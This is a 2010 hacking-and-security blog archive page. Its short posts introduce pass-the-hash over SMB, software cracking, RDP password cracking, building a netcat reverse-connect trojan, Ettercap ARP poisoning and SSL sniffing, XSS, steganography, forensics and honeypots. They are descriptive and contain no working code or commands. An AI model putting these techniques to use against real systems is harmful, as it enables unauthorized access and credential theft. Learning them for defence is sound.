Pass the Hash with modified SMB Client Vulnerability

A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host.

Thursday, April 1, 2010

Cracking Tutorial

Software cracking is the modification of software to remove protection methods: copy protection, trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware.
The distribution and use of cracked copies is illegal in almost every developed country. There have been many lawsuits over cracking software, but most had to do with the distribution of the duplicated product rather than the process of defeating the protection, due to the difficulty of constructing legally sound proof of individual guilt in the latter instance. In the United States, the Digital Millennium Copyright Act (DMCA) made software cracking, as well as the distribution of information that facilitates software cracking, illegal. However, the law has hardly been tested in U.S. courts in cases of reverse engineering for personal use only. The European Union passed the EU Copyright Directive in May 2001, which makes software copyright infringement illegal as the member states pass legislation pursuant to the directive.

Wednesday, March 31, 2010

Amazon EC2 Service In Depth (Cloud Computing)

Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.
It is a paradigm shift following the shift from mainframe to client-server that preceded it in the early '80s. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure "in the cloud" that supports them. Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically scalable and often virtualized resources as a service over the Internet. It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet.
The term cloud is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network, and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents. Typical cloud computing providers deliver common business applications online which are accessed from another web service or software like a web browser, while the software and data are stored on servers.
A technical definition is "a computing capability that provides an abstraction between the computing resource and its underlying technical architecture (e.g., servers, storage, networks), enabling convenient, on-demand network access to a shared pool of configurable computing resources that can be rapidly provisioned and released with minimal management effort or service provider interaction." This definition states that clouds have five essential characteristics: on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service.
The majority of cloud computing infrastructure, as of 2009, consists of reliable services delivered through data centers and built on servers. Clouds often appear as single points of access for all consumers' computing needs. Commercial offerings are generally expected to meet quality of service (QoS) requirements of customers and typically offer SLAs.

Tuesday, March 30, 2010

Reset Passwords on Windows XP and Vista using Backtrack 4

chntpw is a Linux utility for resetting passwords of Windows (NT or 2k) users. It works by modifying the encrypted password in the registry directly, bypassing the need to use the old password.

Terminal Server / RDP Cracking

The simple demonstration above using the featured tools demonstrates the dangers of using weak passwords (those that can be found in a dictionary file) in Windows Remote Terminal Services and Remote Desktop Protocol (RDP).

Monday, March 29, 2010


A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices which is configured to permit or deny computer based application upon a set of rules and other criteria.
Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.
There are several types of firewall techniques:
  1. Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.
  2. Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.
  3. Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.
  4. Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.

Saturday, March 27, 2010

Samurai Web Assessment Framework

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. The tools included are used in all four steps of a web pen-test.
Starting with reconnaissance, tools such as the Fierce domain scanner and Maltego. For mapping, tools such as WebScarab and ratproxy. Tools for discovery include w3af and burp. For exploitation, the final stage, BeEF, AJAXShell and much more have also been included.

Friday, March 26, 2010

Creating a Win32 Reverse Connect Back Trojan using Netcat

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

In 2000 according to Netcat was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

According to, some of netcat's major features are:

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomization
* Built-in loose source-routing capability
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Optional ability to let another program service established connections
* Optional telnet-options responder
* Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.

2010 Top Ten Hacks of the Year

Thursday, March 25, 2010

SSL Hacking and DNS Spoofing with Backtrack using Ettercap

Ettercap is a Unix and Windows tool for computer network protocol analysis and security auditing. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.
It is free open source software, licensed under the terms of the GNU General Public License.


Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap offers four modes of operation:
  • IP-based: packets are filtered based on IP source and destination.
  • MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway.
  • ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex).
  • PublicARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex).
In addition, the software also offers the following features:
  • Character injection into an established connection: characters can be injected into a server (emulating commands) or to a client (emulating replies) while maintaining a live connection.
  • SSH1 support: the sniffing of a username and password, and even the data of an SSH1 connection. Ettercap is the first software capable of sniffing an SSH connection in full duplex.
  • HTTPS support: the sniffing of HTTP SSL secured data--even when the connection is made through a proxy.
  • Remote traffic through a GRE tunnel: the sniffing of remote traffic through a GRE tunnel from a remote Cisco router, and perform a man-in-the-middle attack on it.
  • Plug-in support: creation of custom plugins using Ettercap's API.
  • Password collectors for: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG
  • Packet filtering/dropping: setting up a filter that searches for a particular string (or hexadecimal sequence) in the TCP or UDP payload and replaces it with a custom string/sequence of choice, or drops the entire packet.
  • OS fingerprinting: determine the OS of the victim host and its network adapter.
  • Kill a connection: killing connections of choice from the connections-list.
  • Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.
  • Hijacking of DNS requests.
Ettercap also has the ability to actively or passively find other poisoners on the LAN.

Wednesday, March 24, 2010

Yahoo! Account Security Failure (POC)

How Cross-Site Scripting (XSS) Works

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.

Tuesday, March 23, 2010

Friday, March 19, 2010


Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. The word steganography is of Greek origin and means "concealed writing" from the greek words steganos meaning covered or protected, and graphein (Γράφειν) meaning to write. The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia, a treatise on cryptography and steganography disguised as a book on magic. Generally, messages will appear to be something else: images, articles, shopping lists, or some other covertext and, classically, the hidden message may be in invisible ink between the visible lines of a private letter.
The advantage of steganography, over cryptography alone, is that messages do not attract attention to themselves. Plainly visible encrypted messages—no matter how unbreakable—will arouse suspicion, and may in themselves be incriminating in countries where encryption is illegal. Therefore, whereas cryptography protects the contents of a message, steganography can be said to protect both messages and communicating parties.
Steganography includes the concealment of information within computer files. In digital steganography, electronic communications may include steganographic coding inside of a transport layer, such as a document file, image file, program or protocol. Media files are ideal for steganographic transmission because of their large size. As a simple example, a sender might start with an innocuous image file and adjust the color of every 100th pixel to correspond to a letter in the alphabet, a change so subtle that someone not specifically looking for it is unlikely to notice it.

Wednesday, March 17, 2010

Forensic Toolkit (FTK)

Forensic Toolkit, or FTK, is a computer forensics software made by AccessData. It scans a hard drive looking for various information. It can for example locate deleted emails and scan a disk for text strings to use them as a password dictionary to crack encryption.

Tuesday, March 16, 2010


Honeyd is an open source computer program that allows a user to set up and run multiple virtual hosts on a computer network. These virtual hosts can be configured to mimic several different types of servers, allowing the user to simulate an infinite number of computer network configurations. Honeyd is primarily used in the field of computer security by professionals and hobbyists alike, and is included as part of Knoppix Security Tools Distribution.



Honeyd is used primarily for two purposes. Using the software's ability to mimic many different network hosts at once (up to 65536 hosts at once), Honeyd can act as a distraction to potential hackers. If a network only has 3 real servers, but one server is running Honeyd, the network will appear running hundreds of servers to a hacker. The hacker will then have to do more research (possibly through social engineering) in order to determine which servers are real, or the hacker may get caught in a honeypot. Either way, the hacker will be slowed down or possibly caught.


Honeyd gets its name for its ability to be used as a honeypot. On a network, all normal traffic should be to and from valid servers only. Thus, a network administrator running Honeyd can monitor his/her logs to see if there is any traffic going to the virtual hosts set up by Honeyd. Any traffic going to these virtual servers can be considered highly suspicious. The network administrator can then take preventative action, perhaps by blocking the suspicious IP address or by further monitoring the network for suspicious traffic.
Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security